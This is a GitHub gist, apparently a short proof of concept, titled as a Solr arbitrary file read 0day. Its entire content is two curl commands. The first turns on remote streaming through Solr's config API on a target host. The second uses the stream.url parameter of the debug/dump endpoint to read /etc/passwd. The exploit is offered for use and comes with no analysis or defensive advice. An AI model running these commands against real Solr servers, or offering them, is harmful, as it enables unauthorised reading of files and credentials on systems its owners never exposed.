Created
March 17, 2021 14:33
-
-
Save 0xf4n9x/2075ef36cc311a5e08aac983fc92e141 to your computer and use it in GitHub Desktop.
Solr Arbitrary File Read 0day Vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ip="192.168.1.12:8983" | |
# curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://$ip/solr/db/config -H 'Content-type:application/json' | |
# curl "http://$ip/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment